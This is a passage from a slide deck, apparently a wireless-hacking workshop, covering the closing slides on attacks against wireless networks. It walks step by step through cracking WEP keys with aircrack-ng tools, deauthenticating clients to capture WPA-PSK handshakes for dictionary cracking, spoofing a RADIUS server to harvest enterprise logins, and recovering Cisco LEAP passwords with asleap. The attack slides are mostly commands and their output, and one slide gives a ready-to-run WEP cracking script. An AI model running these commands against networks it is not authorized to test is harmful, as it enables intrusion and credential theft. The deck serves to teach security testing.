  • 27. Owned the WEP Key with Advanced Technique (With Inject Method) Korek ChopChop Attack Just answer yes  ----------------------- Use this packet ? y ----------------------- And then the system will do the decrypting  --------------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-211242.cap Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms And so on ... The AP appears to drop packets shorter than 40 bytes. Enabling standard workaround: IP header re-creation. Saving plaintext in replay_dec-0223-211410.cap Saving keystream in replay_dec-0223-211410.xor Completed in 21s (2.48 bytes/s) ---------------------------------------------------------------------------------------
  • 28. Owned the WEP Key with Advanced Technique (With Inject Method) Packetforge To create encrypted packet form PRGA (XOR)  that obtained from the chopchop or fragment attack. #Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y replay_dec-0223-211410.xor –w arp The result is:  ---------------------- Wrote packet to: arp ---------------------- From this command, we get ARP request packet  in file named “arp”.
  • 29. Owned the WEP Key with Advanced Technique (With Inject Method) ARP Request Replay with Interactive Attack We use aireplay to inject arp request packet to access  point by following command: #aireplay-ng -2 –r arp rausb0 And…  ----------------------------------------------------------------------------------- Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:21:27:C0:07:71 0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q 0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4 0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; 0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ 0x0040: 66bf 700e f.p. Use this packet ? -----------------------------------------------------------------------------------
  • 30. Owned the WEP Key with Advanced Technique (With Inject Method) ARP Request Replay with Interactive Attack Yes is the only option available  ----------------------- Use this packet ? y ----------------------- Now aireplay-ng starts injecting the packets  ------------------------------------------------------- Saving chosen packet in replay_src-0223-211755.cap You should also start airodump-ng to capture replies. Sent 1200 packets...(499 pps) ------------------------------------------------------- And don’t forget to start airodump-ng 
  • 31. Owned the WEP Key with Advanced Technique (With Inject Method) Cracking WEP Key #aircrack-ng –z capture1.cap (PTW Attack) The successful cracking result is following: --------------------------------------------------------------- Opening capture1.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% ---------------------------------------------------------------
  • 32. Conclusion Scripts for Cracking WEP $AP is Access Point MAC Address  $WIFI is WIFI Card MAC Address  airmon-ng start wlan0 11 (Must specific channel of Monitor Mode) airodump-ng -c 11 -w capture1.cap wlan0 aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 aireplay-ng -4 -b $AP -h $WIFI wlan0 If Its Not Working!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay.xor -w arp aireplay-ng -2 -r arp wlan0 aircrack-ng -z capture1.cap
  • 33. Owned the WPA-PSK/WPA2-PSK Key The idea for cracking Pre-shared key is to  gather four ways handshake packets.
  • 34. Owned the WPA-PSK/WPA2-PSK Key We are able to do this by de-authenticate  associated client. This way will force the client to perform re-  authentication and we can get four ways handshake from this process. The command for de-authentication is:  #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
  • 35. Owned the WPA-PSK/WPA2-PSK Key #aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap Opening test-02.cap Read 252 packets. # BSSID ESSID Encryption 1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) Choosing first network as target. Opening workshop-02.cap Reading packets, please wait... Aircrack-ng 1.0 rc1 r1085 [00:00:00] 0 keys tested (0.00 k/s) KEY FOUND! [ TheFuckinWPAKey ] Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
  • 36. Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP) Most companies turned to use public key encryption with  wireless network and they think that it is perfectly safe. But the tricky hacker still attacks this system by spoofing  certificate. This attacking method takes an advantage of client incaution.  Many clients accept certification without considering whether it is genuine certificate or not. This make attacker impersonate himself to be radius server  and login credential information from victims. We can use freeradius as fake radius server combining with  WPE patch to enable login credential information on freeradius server additional information:  http://www.willhackforsushi.com/FreeRADIUS_WPE.html
  • 37. Exploiting CISCO LEAP Cisco proprietary Lightweight Extensible  Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities by supporting centralized, user- based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible  authentication protocol (EAP) types specified by 802.1X. We found that the usernames that are sent to  Radius are plaintexts, that captured from Wireshark but the password was encrypted. So It's also vulnerable to exploit… (insert evil 
  • 38. Exploiting CISCO LEAP asleap is a tool designed to recover weak  LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. asleap can perform:   Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture  Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED Download Here: http://asleap.sourceforge.net/ 
  • 39. Exploiting CISCO LEAP First step, Use asleap to produce the  necessary database (.dat) and index files (.idx) #./genkeys -r dictionary -f dict.dat -n dict.idx dict = Our wordlist/dictionary file, with one word per line dict.dat = Our new output pass+hash file (generated as a result of running this command) dict.idx = Our new output index filename (generated as a result of running this command) ----------------------------------------------------------------------- genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com> Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second Starting sort (be patient) ...Done. Completed sort in 0 compares. Creating index file (almost finished) ...Done. –----------------------------------------------------------------------
  • 40. Exploiting CISCO LEAP The final step in recovering our weak LEAP password is  to run the asleap command with our newly created .dat and .idx files: #./asleap -r data/leap.dump -f dict.dat -n dict.idx leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used) dict.dat = Our output pass+hash file (generated with genkeys, see above) dict.idx = Our new output index filename (generated with genkeys, see above)
  • 41. Exploiting CISCO LEAP So… what are we waiting for?  #./asleap -r data/leap.dump -f dict.dat -n dict.idx ----------------------------------------------------------------------- asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> Using the passive attack method. Captured LEAP exchange information: username: qa_leap challenge: 0786aea0215bc30a response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6 hash bytes: 4a39 NT hash: a1fc198bdbf5833a56fb40cdd1a64a39 password: qaleap Closing pcap ... ----------------------------------------------------------------------- Now ASLEAP 2.2, which includes the “-C” and “-R” options to specify the  hex-delimited bytes for the challenge and the response (respectively). Using this option, Asleap becomes a generic MS-CHAPv2 cracking tool, and can be applied anytime you have a MS-CHAPv2 packet capture available.
  • 42. References & Greetz to PaulDotCom Forum  http://www.darkoperator.com/scripts  http://trac.metasploit.com/wiki/Karmetasploit  http://aircrack-ng.org/doku.php  http://www.citec.us  http://www.milw0rm.com  Greetz to the CWH Underground team:  Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter,  Conan, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke, citec.us, milw0rm.com 
  • 43. About Me / Questions I’m Siddiq, 19.   Currently pursuing Degree in Biochemistry at Technology Park Malaysia College.  A retarded lazy part-time web programmer @ I- don’t-know-anything-about-IT  Currently looking for a real part-time job.  mysiddiq@gmail.com Thanks for attending.  Questions? 